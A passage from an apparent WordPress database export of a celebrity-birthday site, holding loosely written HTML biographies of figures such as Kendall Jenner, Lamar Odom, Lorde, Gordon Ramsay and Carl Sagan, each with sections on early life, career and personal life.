Got”.\r\n\r\nThe success didn\'t stick for long though. The St. Lunatics even decided Nelly would be more successful as a solo act who might be able to bring attention to their entire group. Later their theory was proven correct when Nelly decided to sign up with Universal on a solo contract.\r\n<h3>Career Accomplishments</h3>\r\nThe year Nelly signed up with Universal. He came out with his debut album called <em><a href=\"http://www.rollingstone.com/music/news/nelly-readies-country-music-ep-20150428\" target=\"_blank\">Country Grammar</a></em>. Nelly soon saw fame coming his way when he became a huge hit almost overnight. His album featured a few appearances by the St. Lunatics too. His record even went platinum nine times in the United States. Reaching the No. 3 spot on the <em>Billboard</em> 200 chart.\r\n\r\nAt one point the album even held the No. 1 spot on the album chart. The single “Country Grammar” even hit the No. 7 spot on the <em>Billboard</em> Hot 100 singles and held the No. 1 on the the rap chart too. The second single from the album, “Ride with Me”, reached the No. 3 spot too.\r\n\r\nThe following year Nelly and the St. Lunatics released their first album together called <em>Free City</em>. The album reached platinum status in the United States. Nelly even released his second solo record called <em>Nellyville</em> in 2002 too. Once again Nelly saw his album reach the No. 1 spot and was even nominated for album of the year for the 2003 Grammy Awards.\r\n<h3>Most Known For</h3>\r\nNelly is still well known for his solo debut <em>Country Grammar</em>. Ever since his debut Nelly has been able to make sure his music sounds unique and fresh. The next four albums he created reached the top three on the <em>Billboard</em> chart. His singles even having a routine of making it to the top 20. Four of them even able to reach the No. 1 spot too.\r\n\r\nNelly is also a two time <a href=\"http://www.aceshowbiz.com/celebrity/nelly/awards.html\" target=\"_blank\">Grammy Award</a> winner. Even appearing on television like the series <em>CSI: NY</em> and even starring in the film <em>The Longest Yard</em>.\r\n<h3>Current Personal Life</h3>\r\nNelly is very good at keeping his private life secret from the public. Until the reality show <em>Nellyville</em> was launched in order to help him win back some of his fame from earlier in the century. Most people didn\'t even know Nelly had children. During the first episode of his reality show the focus was on his relationship with Shantel Jackson.\r\n\r\nAt one point Nelly did have a relationship with Ashanti, but the two broke up. He\'s currently focused on his children and helping to turn them into minor start on the social media circuit.\r\n<h3>Where Are They Now</h3>\r\nNelly has slowly faded from the limelight over the years. He has tried to capture the fame he had earlier in his career. He came out with a new album in 2013 that went largely unnoticed. In 2014 he tried to make a comeback with a reality show called <em><a href=\"http://www.bet.com/shows/nellyville.html\" target=\"_blank\">Nellyville</a></em> that focuses on his personal life.\r\n\r\n \r\n\r\n ','Nelly (1974 – Present)','','draft','open','open','','nelly','','','2015-11-03 01:51:36','2015-11-03 01:51:36','',0,'http://birthdaypedia.com/?p=525',0,'post','',0),(526,2,'2016-11-03 09:15:09','2016-11-03 09:15:09','Kendall Jenner has been featured on the E! Reality TV show known as <em><a href=\"https://en.wikipedia.org/wiki/Keeping_Up_with_the_Kardashians\" target=\"_blank\">Keeping Up with the Kardashians</a></em>. She has kept up her career specializing in dresses for pageants and proms. Even being featured in an article by People magazine\'s called “Beautiful People”.\r\n<h3>In the Beginning</h3>\r\nKendall Jenner was born on November 3, 1995 in <a href=\"http://lacity.org/\" target=\"_blank\">Los Angeles, California</a>. Her parents are Bruce and Kris Jenner. She also has a younger sister named Kylie. Along with her half sisters on her mother\'s side: Khloe Kardashian, Kourtney Kardashian, and Kim Kardashian. Along with her half brother Robert Kardashian. On her father\'s side Kendall has four more half siblings. Casey, Burt, Brody, and Brandon Jenner.\r\n\r\nShe was a cheerleader when she attended Sierra Canyon High School. She was home schooled afterwards in 2012 and 2013. Kendall didn\'t start her career though until she signed up with a modeling agency when she was fourteen years old. She modeled for the Forever 21 campaign. Kendall made an appearance in OK! Magazine and even <a href=\"http://www.teenvogue.com/gallery/kendall-jenner-fashion-timeline\" target=\"_blank\">Teen Vogue</a>. Her modeling debut took off when she did the Sherri Hill prom dress line in 2011.\r\n<h3>Career Accomplishments</h3>\r\nKendall has modeled quite a bit early in her career. She modeled for the Hello Kitty Launch for the company Forever 21. Seventeen magazine even named her and Kylie as the Style Stars of 2011. Kendall has even hosted a few red carpet events for <em>Breaking Dawn Part 1</em> and <em>Glee 3D Concert Movie</em>. PacSun launched a clothing line in 2013 by Kylie and her sister called “Kendall & Kylie.”\r\n<h3>Most Known For</h3>\r\nKendall is best known for her career as being a successful model despite her age. Especially for for the reality TV show Keeping Up with the Kardashians. Kendall is recognized for being a runway model and has made several appearances at public events. She didn\'t make her modeling debut as a runway model though until she modeled for the Sherri Hill\'s Spring 2012 Fashion Show.\r\n<h3>Current Personal Life</h3>\r\nKendall has been dipping her toes romantically in celebrity life. She was linked to Will Smith\'s son, Jaden Smith, in the past. At one point she was dating Harry Styles from One Direction in November 2013 to February 2014. After they broke up it was reported she may be romantically involved with Justin Bieber. She did start a relationship with Nick Jonas in 2015. They seem to still be currently dating however.\r\n<h3>Where Are They Now</h3>\r\nKendall is still new to her career and currently building up her repertoire as a model. She has become a brand ambassador for <a href=\"http://www.seventeen.com/\" target=\"_blank\">Seventeen Magazine</a>. She\'s well known for being a part of the Jenner/Kardashian family empire. She has been romantically involved with a few other celebrities as well. Her newest relationship being involved with Nick Jonas. At one point it was rumored she was romantically involved with Justin Bieber. However, Kendall\'s focus has been on her career and modeling. Setting a strong foundation for her future as a model as well.\r\n\r\nKendall is very accomplished for her age. From the age of fourteen she had been able to reach stardom and build her career as a model. If she continues at the rate she is now. There\'s no doubt Kendall will soon become a household name. She\'s been very busy on the modeling circuit. Modeling on the runaway and going to public events as well. Kendall may be able to continue her career as a professional model as well if she doesn\'t lose focus. Her career seems to be steady at the moment, and can only mature at this point.\r\n\r\n \r\n\r\n ','Kendall Jenner (1995 – Present)','','publish','open','open','','kendall-jenner','','','2016-11-28 23:10:42','2016-11-28 23:10:42','',0,'http://birthdaypedia.com/?p=526',0,'post','',0),(527,2,'2016-11-04 08:34:12','2016-11-04 08:34:12','Jessa Duggar is well known for the work she has done on <em>17 Kids and Counting</em> in 2008. Along with her work on <em>Today</em> in 1952, and <em>16 Children and Moving In</em> in 2006. She recently married a man named Ben Seewald on November 1, 2014.\r\n<h3>In the Beginning</h3>\r\nJessa Duggar was born on November 4, 1992. She was born in <a href=\"http://www.tontitown.com/\" target=\"_blank\">Tonitown, Arkansas</a>. She\'s the fifth child out of nineteen children. Her parents are Michelle Duggar and Bob Duggar. As a child she was home schooled. Her life was made public from a young age though due to her family being featured in a documentary made in 2004 called <em>14 Children and Pregnant Again</em>. Another documentary was produced in 2006 about her family called Raising 16 Children after her sister Johannah was born.\r\n\r\nShe did co-write a book called “<a href=\"http://www.bustle.com/articles/20075-5-ways-the-growing-up-duggar-book-about-relationships-makes-me-jealous-of-jana-jill-jessa\" target=\"_blank\">Growing Up Duggar</a>” with her sisters Jill, Jana, and Jinger Duggar. She has nineteen siblings as well and has been featured on the reality show <em>19 Kids & Counting</em>.\r\n<h3>Career Accomplishments</h3>\r\nJessa Duggar is a bit of an actor for the work she has done on <em>17 Kids and Counting</em> in 2008 and 1<em>6 Children and Moving In</em>. She\'s even been on the reality show <em><a href=\"https://en.wikipedia.org/wiki/19_Kids_and_Counting\" target=\"_blank\">19 Kids & Counting</a></em> alongside her siblings too. The show follows the life of Jessa and her family as they try to get along and their relationship with each other.\r\n<h3>Most Known For</h3>\r\nJessa Duggar is known for co-writing the book “Growing Up Duggar” with her sisters Jinger, Jill, and Jana Duggar. She did not become a big part of the reality show her family had until her relationship with Ben Seewald started. The couple met through Jessa\'s church and started their relationship. The two dated for eleven months before they announced they were getting engaged. They married on November 1, 2014. They tied the knot in front of over 1,000 people in Springdale, Ark.\r\n<h3>Current Personal Life</h3>\r\nJessa Duggar and Ben Seewald made an announcement on April 21, 2015 stating they were going to be expecting their first child on November 1<sup>st</sup>. The due date for their baby was passed and they celebrated their first year of being married as well. She even sent a loving message to Ben about their wedding anniversary saying:\r\n\r\n<em> “To the man of my dreams: Baby, you are my best friend and the Love of my life! I\'m so thankful to God for bringing us together! This past year with you has been the best yet – I\'m sure only to be outdone by the next!”</em>\r\n<h3>Where Are They Now</h3>\r\nJessa Duggar has not been in the limelight for very long. In recent years she has been focused on the relationship she has with Ben Seewald. The two courted for eleven months before they tied the knot. Jessa did have fun with her family members when she asked them to guess the weight of the baby. Revealing the birth weight of herself and her husband to give her family members an idea of what they might expect. She\'s even joked about having a chubby baby boy.\r\n\r\nJessa Duggar is still waiting to have her baby. She has recently passed the due date, and is bound to have her baby very soon. Her husband has been at her side most of the time. The two recently celebrated their first year anniversary. So, it\'s an exciting time for them. After her baby is born Jessa Duggar may not be in the limelight for very long. Instead she\'ll be focusing on her baby boy and her new little family.\r\n\r\n \r\n\r\n \r\n\r\n ','Jessa Duggar (1992 – Present)','','publish','open','open','','jessa-duggar','','','2016-11-28 22:56:11','2016-11-28 22:56:11','',0,'http://birthdaypedia.com/?p=527',0,'post','',0),(528,2,'2016-11-05 09:24:25','2016-11-05 09:24:25','Kris Jenner is a reality television star. She\'s been called the “momager” and has appeared on the hit reality TV show called <em><a href=\"https://en.wikipedia.org/wiki/Keeping_Up_with_the_Kardashians\" target=\"_blank\">Keeping Up with the Kardashians</a></em>. She stars on the show alongside her daughters and her husband as well.\r\n<h3>In the Beginning</h3>\r\nKris Jenner was born on November 5, 1955 in <a href=\"http://www.sandiego.gov/\" target=\"_blank\">San Diego, California</a>. Her father is Robert Houghton who worked as an aircraft engineer. Kris has a younger sister named Karen as well. Her parents filed for a divorce in 1962. Her mother decided to sell the family home in the Point Loma area in San Diego. Kris, her mom, and her sister then all moved to Clairemont, California. Kris then attended the Longfellow Elementary School.\r\n\r\nKris did develop a cancerous bone tumor a year after her parents\' divorce. Thankfully, the cancer didn\'t spread. She had to undergo surgery to have the tumor removed. Afterwards she was declared completely healthy. Kris\' mother did remarry a few years later to a man called Harry Shannon. They moved to Oxnard, California. Harry\'s business partner ended up running away with the company\'s money. Forcing the family to move back to San Diego.\r\n\r\nKris graduated from Clairemont High School. Despite going to school she declared that her interest lay in “getting out in the world” and marrying and being a mother versus going to college.\r\n<h3>Career Accomplishments</h3>\r\nKris did marry Robert Kardashian in 1978. They had four children together before they got a divorce in 1989. In 1991 she marred Bruce Jenner and started to manage the new family franchise. The couple have had two daughter, Kylie and Kendall. In 2007, the hit reality TV show <em>Keeping Up with the Kardashians</em> finally aired. The show saw a couple of spin-offs. In 2013 Kris did attempt to host her own talk show, but it did not last long.\r\n<h3>Most Known For</h3>\r\nKris Jenner is best known for being the “momager”on the popular reality TV show <em>Keeping Up with the Kardashians</em>. The show follows the family living their lives and being celebrity entrepreneurs. Kris has also seen some fame for marrying the Olympic gold medal winning decathlete <a href=\"http://hollywoodlife.com/celeb/bruce-jenner/\" target=\"_blank\">Bruce Jenner</a> in 1991.\r\n\r\nNot only did she become his wife, but she even became his manager too. Negotiating endorsement deals for her husband and helping him to promote his career as a race car driver. Even directing the family franchise as well on her own.\r\n<h3>Current Personal Life</h3>\r\nKris has seen a bit of trouble in her personal life. She and her husband Bruce Jenner ended up separating as well. The pair did claim the split was agreed upon to E! News. Even stating:\r\n\r\n“We will always have much love and respect for each other. Even though we are separated, we will always remain best friends and, as always, our family will remain our number one priority.” They finally filed for divorce in September of 2014.\r\n<h3>Where Are They Now</h3>\r\nKris has currently been manager of the family franchise. In 2013, she did attempt to make a debut with her own TV talk show. The program failed to attract a wide enough audience however. So the talk show was never renewed.\r\n\r\nIn the meantime, Kris has been the manager of the business ventures of her biological children. Along with handling their public appearances. Earning her the nickname of “momager”. The business ventures she handles is everything from fragrance lines to clothing. She has even dealt with the autobiographies <em>Kardashian Konfidential</em> and <em>Kris Jenner...And All Things Kardashian</em>. At the moment it appears Kris Jenner is not going to be slowing down anytime soon.\r\n\r\n \r\n\r\n \r\n\r\n ','Kris Jenner (1955 – Present)','','publish','open','open','','kris-jenner','','','2016-11-28 22:46:49','2016-11-28 22:46:49','',0,'http://birthdaypedia.com/?p=528',0,'post','',0),(529,2,'2016-11-06 09:06:06','2016-11-06 09:06:06','Lamar Odom is professional basketball player who once played for the Los Angeles Lakers for seven seasons. Parade Magazine even listed Lamar Odom as the 1997 National Player of the Year for his athletic skills and talent.\r\n<h3>In the Beginning</h3>\r\nLamar Odom was born on November 6, 1979 in <a href=\"https://en.wikipedia.org/wiki/South_Jamaica,_Queens\" target=\"_blank\">South Jamaica, Queens, New York</a>. At the time Lamar Odom was born, it was during the crack cocaine epidemic taking place in New York City in the 1980s and \'90s. His father was Joseph, a man who was a heroin addict and a disabled his veteran. His mom on the other hand, Cathy Mercer, raised Lamar on her own. So the two became very close.\r\n\r\nCathy worked as a traffic and corrections officer. She wanted to make sure Lamar stayed away from the dangers of the street in the area they lived in. Lamar took to basketball when he was only seven years old, and came to love the game. Practicing hard so he could become better and better at it.\r\n\r\nLamar\'s athletic skill improved as he continued to practice basketball. His mother passed away due to colon cancer when he was only twelve years old. After the death of his mother he went to go live with his grandmother, Mildred Mercer, who encouraged him to focus on his sports and studies like his mother had.\r\n\r\nLamar attended Christ the King High School, and had begun to receive national attention for his skills in basketball. He also attended the Redemption Christian Academy in Troy, New York before playing for the St. Thomas Aquinas High School in New Britain, Connecticut in his senior year of high school. At the time <a href=\"http://www.celebuzz.com/photos/lamar-odom-timeline/lamar-odom-5-2/\" target=\"_blank\">Parade Magazine</a> named Lamar Odom as “Player of the Year”.\r\n\r\nDespite the national attention, Lamar Odom enrolled in the University of Nevada in Las Vegas. Even enrolling in summer classes, but the university released Lamar when <em>Sports Illustrated</em> began to question his high ACT score. He did transfer to the University of Rhode Island, but was not allowed to play the 1997-1998 season. He did get his chance to play for one season at Rhode Island, and was eligible for the 1999 NBA Draft. The Los Angeles Clippers selected Lamar Odom, and were only the stepping stone to his budding basketball career.\r\n<h3>Career Accomplishments</h3>\r\nLamar Odom was recognized even at a young age for his athletic prowess in basketball. Parade Magazine called Lamar “Player of the Year” in 1997. In his freshman year of college he was eligible for the NBA draft. The Los Angeles Clippers picked him up, and afterwards Lamar Odom\'s basketball career began. He played a stint with other teams like the Miami Heat, Los Angeles Lakers, and Dallas Mavericks. He was eventually traded back to play for the Los Angeles Clippers.\r\n<h3>Most Known For</h3>\r\nLamar Odom is a well known for his basketball career, but his usually recognized for play for the <a href=\"http://www.nba.com/lakers/\" target=\"_blank\">Los Angeles Lakers</a>. He\'s also appeared on the hit reality TV series Keeping Up with the Kardashians. He married Khloé Kardashian on September 27, 2009. Their relationship was highly publicized a the time. Their wedding was even captured during the time the show was being filmed as well.\r\n<h3>Current Personal Life</h3>\r\nLamar has three children from his former girlfriend Liza Morales. A daughter named Destiny born in 1998, and two sons Lamar Jr. and Jayden, born in 2002 and 2005. Jayden passed away from SIDS in 2006. He married <a href=\"https://en.wikipedia.org/wiki/Khlo%C3%A9_Kardashian\" target=\"_blank\">Khloé Kardashian</a> on September 27, 2009.\r\n<h3>Where Are They Now</h3>\r\nLamar Odom has been facing problems with in his relationship and struggling with <a href=\"http://www.huffingtonpost.com/news/lamar-odom-drug-use/\" target=\"_blank\">drug abuse</a>. In August of 2013, TMZ reported the basketball star was having issues in his marriage. Odom was reported missing by his wife at the time, but it soon came to light his friends were helping him with his drug abuse problems.\r\n\r\nKardashian filed for divorce in December of 2013, and the couple signed for the divorce in July of 2015. People magazine has reported a judgment as not entered into the court, and thus Kardashian and Lamar are still married legally.\r\n\r\nOn October 13, 2015 Lamar was found to be unresponsive at a <a href=\"http://www.theguardian.com/us-news/2015/oct/14/lamar-odom-found-unconscious-at-nevada-love-ranch-brothel-authorities\" target=\"_blank\">Nevada brothel</a>. He had been residing at the brothel for a couple of days. Even taking an herbal sexual stimulant at the time too. He was taken immediately to a local hospital before being transferred to Sunrise Medical Center in Las Vegas.\r\n\r\nIt was reported on October 15, 2015 Lamar was beginning to show improvement. He was eventually released from the hospital and transferred to Cedars-Sinai Hospital in Los Angeles for rehabilitation.\r\n\r\n \r\n\r\n ','Lamar Odom (1979 – Present)','','publish','open','open','','lamar-odom','','','2016-11-28 22:40:03','2016-11-28 22:40:03','',0,'http://birthdaypedia.com/?p=529',0,'post','',0),(530,2,'2016-11-07 09:26:10','2016-11-07 09:26:10','Lorde is a current famous goth who has been hailed as a true original. She\'s a songwriter and pop singer who has a legion of fans. Her interest in music started at an early age, and set the stage for her future career in the music industry.\r\n<h3>In the Beginning</h3>\r\nLorde was born on November 7, 1996 in <a href=\"https://en.wikipedia.org/wiki/Auckland\" target=\"_blank\">Auckland, New Zealand</a>. Her mother, Sonja Yelich, was a prize winning poet. Her father worked as a civil engineer. From a young age it seemed as if Lorde was destined for greatness.\r\n\r\nWhen she was twelve years old when was spotted by a the A&R scout Scott Maclachlan. He saw Lorde singing in a video for her school talent show. When Lorde was thirteen years old, Maclachlan signed Lorde up with Universal Music. When Lorde was fourteen years old she began to work with songwriters in 2012.\r\n\r\nBefore she was signed up with Universal, Lorde has been been writing songs long before then. Even stating:\r\n\r\n<em>“I started writing songs when I was 13 or 14 because I\'ve always been a huge reader. My mum\'s a poet and we\'ve always had so many books, and that\'s always been a big thing for me, arguably more so than music.”</em>\r\n\r\nShe released her first EP called “The Love Club EP” in March of 2013. There was no publicity or marketing down for the EP. Despite this, the EP reached the No. 1 spot on the New Zealand Album Chart. The single “Royals” occupied the top spot as well. In August of 2013, Lorde was the first woman to top the Billboard Alternative Songs Chart in the United States ever since Tracy Bonham did it in 1996.\r\n<h3>Career Accomplishments</h3>\r\nThere was no publicity or marketing done for Lorde\'s first EP, but she still snagged the No. 1 spot on the New Zealand Album Chart. On top of the single “Royals” holding the No. 1 spot at the same time. Lorde was the first woman to hold the No. 1 spot on the Billboard Alternative Songs Charts in the United States ever since <a href=\"https://en.wikipedia.org/wiki/Tracy_Bonham\" target=\"_blank\">Tracy Bonham</a> did it in 1996.\r\n\r\nShe\'s even picked up a couple of awards since her career started as well. At the 56<sup>th</sup> Grammy Awards she won the awards for “Best Pop Vocal Performance” and “Song of the Year” for her single “Royals.” At the BRIT awards she won an award for “International Female Solo Artist”. Along with the “Best New Artist” award at the inaugural iHeartRadio Awards.\r\n<h3>Most Known For</h3>\r\nLorde is still fairly young in her career. She\'s still widely known for her EP “The Love Club EP” along with its hit single “Royals”. Lorde is set to release her first full length album titled “Pure Heroine” in September.\r\n<h3>Current Personal Life</h3>\r\nLorde is currently dating her boyfriend, <a href=\"http://www.people.com/people/article/0,,20781549,00.html\" target=\"_blank\">James Lowe</a>, who is eight years her senior. She takes pictures of her and James all the time. Posting them to Instagram constantly. In one picture she and James are brushing their teeth together. On the caption it says “Happy Birthday James”. There is another picture of James sleeping with the caption, “James is sick.”\r\n<h3>Where Are They Now</h3>\r\nLorde is still focused on her career. Her success from “<a href=\"http://www.rollingstone.com/music/lists/100-best-songs-of-2013-20131204/lorde-royals-19691231\" target=\"_blank\">Royals</a>” is still high. Along with her success, she\'s been having a relationship with James Lowe who is eight years older than her. Despite her age, Lorde has shown a strong passion for her music career. If she continues to do well she may become a household name. She has a lot of potential to be something truly great in her generation.\r\n\r\n \r\n\r\n ','Lorde (1996 – Present)','','publish','open','open','','lorde','','','2016-11-28 22:33:39','2016-11-28 22:33:39','',0,'http://birthdaypedia.com/?p=530',0,'post','',0),(531,2,'2016-11-08 09:46:06','2016-11-08 09:46:06','Gordon Ramsay is the hot tempered chef whose well known for his television series <em>Hell\'s Kitchen</em>. Despite his on-screen persona, Gordon Ramsey does own several highly successful restaurants.\r\n<h3>In the Beginning</h3>\r\nGordon Ramsay was born on November 8, 1966 in <a href=\"https://en.wikipedia.org/wiki/Glasgow\" target=\"_blank\">Glasgow, Scotland</a>. He grew up in Stratford, England after his family move there when he was only five years old. At a young age Ramsay fell in love with the sport of soccer. Even dreaming of a professional sports career later in life. When he was fifteen years old he joined the Glasgow Rangers.\r\n\r\nHe spent three years with his team until he suffered a knee injury in 1985. Ramsay had to start over, and went back to college to get a degree in hotel management. Once he finished his studies, he took direction under a couple of Europe\'s top chefs. He apprenticed with top chefs like <a href=\"http://www.marcopierrewhite.org/\" target=\"_blank\">Marco Pierre White</a> at Harvey\'s in London, and even worked for <a href=\"http://www.theguardian.com/lifeandstyle/2014/may/18/seven-ages-chef-albert-roux\" target=\"_blank\">Albert Roux</a> at Le Gavroche at one point. He worked under other master chefs too like Jol Robuchon and Guy Savoy in France.\r\n\r\nRamsay went on his own as a head chef in 1993 in the newly opened restaurant in London called Aubergine. Over three years he was able to get the restaurant a rating of two stars from Michelin. Ramsay began to receive recognition for his talent when in 1995 he received the “Newcomer of the Year” award at the Catey Awards.\r\n\r\nRamsay left Aubergine and opened his own restaurant called Gordon Ramsay in 1998. His restaurant soon earned a good reputation. Even receiving a three star rating from Michelin. In the same year his popularity skyrocketed when he released his first book titled <em>Passion for Flavour</em>.\r\n<h3>Career Accomplishments</h3>\r\nGordon Ramsay didn\'t see his television career take off until the late 1990s. He was the main focus for a British television documentary called <em>Boiling Point</em>. A reality series was launched later with the same name. It became so popular a second program was featured in 2004 called <em>Ramsay\'s Kitchen Nightmares</em>.\r\n<h3>Most Known For</h3>\r\nToday, Gordon Ramsay is widely recognized for his show <em><a href=\"https://en.wikipedia.org/wiki/Hell%27s_Kitchen_(U.S._TV_series)\" target=\"_blank\">Hell\'s Kitchen</a></em>. It was first featured in May of 2005, and places people who wish to open their own restaurant underneath the eye of Gordon Ramsay himself. The show was about narrowing down the participants until there was only one winner. This helped Gordon Ramsay to establish an adaption for his British program, <em>Kitchen Nightmares</em>.\r\n<h3>Current Personal Life</h3>\r\nGordon Ramsay is still doing as good as ever. He currently lives with his wife Tana their children in South London. He jogs home from work at night after he\'s had a long shift at one of his London restaurants.\r\n<h3>Where Are They Now</h3>\r\nRamsay has continued to be successful in his career. His success with the show <em>Hell\'s Kitchen</em> is still widely popular even today. Due to his great success he has been able to open his first American restaurant called Gordon Ramsay at The London in New York, He currently owns a multinational corporation called Ramsay Holdings. He now has restaurants opened around the globe.\r\n\r\nGordon Ramsay has continued to be a success throughout his career. He\'s widely recognized as one of the best and beloved chefs in the media. His show <em>Hell\'s Kitchen</em> played a huge part in making him popular in the United States. Even with his success, Ramsay has continued to keep a steady pace with his career. Only getting better and better as time goes by. He\'s bound to continue on for a quite a few years yet at the rate he\'s going.\r\n\r\n \r\n\r\n ','Gordon Ramsay (1966 - Present)','','publish','open','open','','gordon-ramsay-1966-present','','','2016-11-28 22:30:28','2016-11-28 22:30:28','',0,'http://birthdaypedia.com/?p=531',0,'post','',0),(532,2,'2016-11-09 09:54:08','2016-11-09 09:54:08','Carl Sagan was a well known scientist in the 1970s and 1980s. He co-wrote and hosted \'Cosmos: A Personal Voyage\', was an advocate for nuclear disarmament, and even studied extraterrestrial intelligence before his death in 1996.\r\n<h3>In the Beginning</h3>\r\nCarl Sagan was born on November 9, 1934 in <a href=\"https://en.wikipedia.org/wiki/Brooklyn\" target=\"_blank\">Brooklyn, New York</a>. Sagan\'s interest on the subject of astronomy started early in his life. His mother had sent him to the library to seek out books on stars. Later, his parents brought him along to the New York World\'s Fair. He saw visions of the future, and Sagan\'s interest grew. He became a big fan of science fiction stories in 1940s that could be found in pulp magazines at the time. Reports of extraterrestrial life and flying saucers drew him in even more on the subject.\r\n\r\nSagan graduated from high school in 1951 when he was only sixteen years old. He set his sights on the <a href=\"http://www.uchicago.edu/\" target=\"_blank\">University of Chicago</a> where he conducted experiments. His interest in alien life only grew due to these experiments. In 1955, he graduated with a BA in physics. Taking his master\'s the following year. Sagan moved to California four years later and earned a PhD in astrophysics and astronomy.\r\n\r\nHe eventually ended up at the University of California, Berkeley to study astronomy. He was on a team where he helped to develop the infrared radiometer for <a href=\"http://www.nasa.gov/multimedia/imagegallery/image_feature_964.html\" target=\"_blank\">NASA\'s <em>Mariner 2</em></a> robotic probe.\r\n<h3>Career Accomplishments</h3>\r\nSagan eventually worked his way up to become the director of Cornell\'s Laboratory for Planetary Studies in 1968. He even worked with <a href=\"https://www.nasa.gov/\" target=\"_blank\">NASA</a> on a few projects as well. In 1983 he even came forward with the idea of a “nuclear winter”. He did write a novel, followed by several books and academic papers as well. At one point he even had a TV series called <em>Cosmos</em>. The TV series was remade and came back to television in 2014.\r\n\r\nSagan has even won awards for his amazing work and research. He received the NASA Distinguished Public Service Medal in 1977, the Pulitzer Prize for General Non-Fiction in 1978, the Oersted Medal in 1990, and even the National Academy of Sciences Public Welfare Medal in 1994.\r\n<h3>Most Known For</h3>\r\nSagan is known for his work with NASA and his theories on extraterrestrial intelligence. Perhaps one of his most widely recognized works in his lifetime was his show, <em><a href=\"https://en.wikipedia.org/wiki/Cosmos:_A_Personal_Voyage\" target=\"_blank\">Cosmos</a></em>. In 2014, the show was reborn and <em>Cosmos</em> came back as an excellent television series. In 1980, he was the co-founder for the Planetary Society as well.\r\n<h3>Current Personal Life</h3>\r\nSagan passed away due to pneumonia and a complication of a bone marrow disease. He passed away on December 20, 1996 at 62 years old. Eighteen years after his passing <em>Cosmos</em> was brought back to the television. Neil DeGrasse Tyson took on hosting duties and a whole new generation of people were excited about lays beyond the atmosphere of the Earth.\r\n<h3>Where Are They Now</h3>\r\nSagan passed away before his time. However, in his wake he has left behind a legacy. His theories and fascination with extraterrestrial life has helped to gain the interest of a new generation fascinated about what goes on beyond the Earth\'s atmosphere. While many people may not know Carl Sagan is the one who originally came up with the show <em>Cosmos</em>. Many viewers recognize the show and enjoy it immensely.\r\n\r\nCarl Sagan was a brilliant man who won awards for his work and research. During his lifetime he was honored several times for his work. He certainly left his mark on society, and has left a legacy that will be remembered for years to come.\r\n\r\n \r\n\r\n ','Carl Sagan (1934 – 1996)','','publish','open','open','','carl-sagan','','','2016-11-28 22:24:03','2016-11-28 22:24:03','',0,'http://birthdaypedia.com/?p=532',0,'post','',0),(533,2,'2016-11-10 09:11:35','2016-11-10 09:11:35','Tracy Morgan is a comedic actor whose known for his antics. No one ever knows what he\'s going to do next! He received his big break when he appeared on Saturday Night Live. The character he played, the 30 Rock one, was based on his own over the top personality.\r\n<h3>In the Beginning</h3>\r\nTracy Morgan was born on November 10, 1968 in <a href=\"https://en.wikipedia.org/wiki/The_Bronx\" target=\"_blank\">Bronx, New York</a>. He was the second oldest out of five children. He grew up in a low income neighborhood called Bedford-Stuyvesant. At the time Brooklyn was a dangerous place due to the drug trade going on. His father was Jimmy Morgan Sr. who worked as a solider and a musician. His father did several tours in Vietnam and began to use heroin while still in the army. He returned home in 1974 with post traumatic stress disorder and a drug addiction. Tracy was only six years old at the time.\r\n\r\nTracy lived his mother for most of the time. She asked his father to leave due to his drug problem. He attended De Witt Clinton High School for a time, but at that point the relationship with his mother had begun to fail. A year later he moved in with his father. His sister and brother moved in with their father as well soon after.\r\n\r\nTracy\'s father contracted AIDS after he used a dirty hypodermic needle. At the time Tracy had already married Sabina, his high school sweetheart. He dropped out of high school in order to care for his father. His father passed away in November of 1987.\r\n\r\nA friend of Morgan\'s was the one who suggested Morgan pursue comedy in order to make a living. Soon after, his friend was killed due an act of random violence in the community. The death made Morgan pursue stand-up, and soon he developed a popular act. Using the rough situations he had to deal with in his own life as his material for his act.\r\n<h3>Career Accomplishments</h3>\r\nTracy Morgan didn\'t get his big day view until he did a sketch comedy show on S<em>aturday Night Live</em>. He spent seven years on the show. He left SNL in 2003 and created his own show called <em><a href=\"https://en.wikipedia.org/wiki/The_Tracy_Morgan_Show\" target=\"_blank\">The Tracy Morgan Show</a></em>. The show didn\'t gain a big following and ended up only lasting for one season. In 2006 he found his niche with his hit show <em>30 Rock</em>.\r\n<h3>Most Known For</h3>\r\nTracy Morgan is still widely popular for his stint on SNL. While his own show, <em>The Tracy Morgan Show</em>, did not gain the audience backing it needed to continue for a second season. He struck gold in 2006 with his sitcom <em>30 Rock</em> that he created with a SNL co-star Tina Fey.\r\n<h3>Current Personal Life</h3>\r\nTracy Morgan\'s personal life has been a bit rocky. In the 1990s he was diagnosed with diabetes. While he was on SNL he had a drinking problem too. He had to wear a court ordered bracelet during 2007. That same year he had health complications from his diabetes diagnosis, and even had a kidney transplant in 2010.\r\n\r\nHe divorced his wife Sabina as well in 2009 after the couple have been married for 23 years. The same year he published a memoir titled <em>I Am the New Black</em>.\r\n<h3>Where Are They Now</h3>\r\nOn June 7, 2014 Tracy was involved in a <a href=\"http://www.people.com/article/tracy-morgan-stand-up-comedy-first-time-since-accident\" target=\"_blank\">car crash</a>. A Walmart truck crashed into his limo. Killing his friend James McNair. Morgan was taken to the intensive care unit in New Jersey where he was declared to be in critical condition. Walmart settled the lawsuit with Tracy in May 2015. He made a return to live TV at the 67<sup>th</sup> Annual Emmy Awards that year. Nearly a year later he married <a href=\"http://www.people.com/article/tracy-morgan-marries-megan-wollover\" target=\"_blank\">Megan Wollover</a> on August 23, 2015.\r\n\r\nHe\'s even made a comeback to comedy TV as well. In October 2015 he announced a comedy tour called Tracy Morgan: Picking Up the Pieces, will be kicking off in February 2016.\r\n\r\n \r\n\r\n \r\n\r\n ','Tracy Morgan (1968 – Present)','','publish','open','open','','tracy-morgan','','','2016-11-28 19:30:38','2016-11-28 19:30:38','',0,'http://birthdaypedia.com/?p=533',0,'post','',0),(534,2,'2016-11-11 09:05:48','2016-11-11 09:05:48','Leonardo DiCaprio has starred in many famous films over the years. Just to name a few are Django Unchained, Titanic, Inception, and even The Departed. He\'s a talented film actor and environmental activist.\r\n<h3>In the Beginning</h3>\r\nDiCaprio was born on November 11, 1974 in <a href=\"http://lacity.org/\" target=\"_blank\">Los Angeles, California</a>. He was the only child of George and Irmelin DiCaprio. When he was still a toddler his parents became divorced. So, at the time he was raised by his mother who worked as a legal secretary.\r\n\r\nEven though his parents were divorced. DiCaprio still had a close relationship with his father who worked as a book distributor and artist. His parents urged him to explore his creativity, and so he did. Early in life he had an interest in acting. As he puts it:\r\n\r\n<em>“I loved imitating people ... I loved joking around with my parents and creating different characters. I liked doing my own little homemade skits.”</em>\r\n\r\nHe didn\'t see a lot of success for his budding acting career until his early 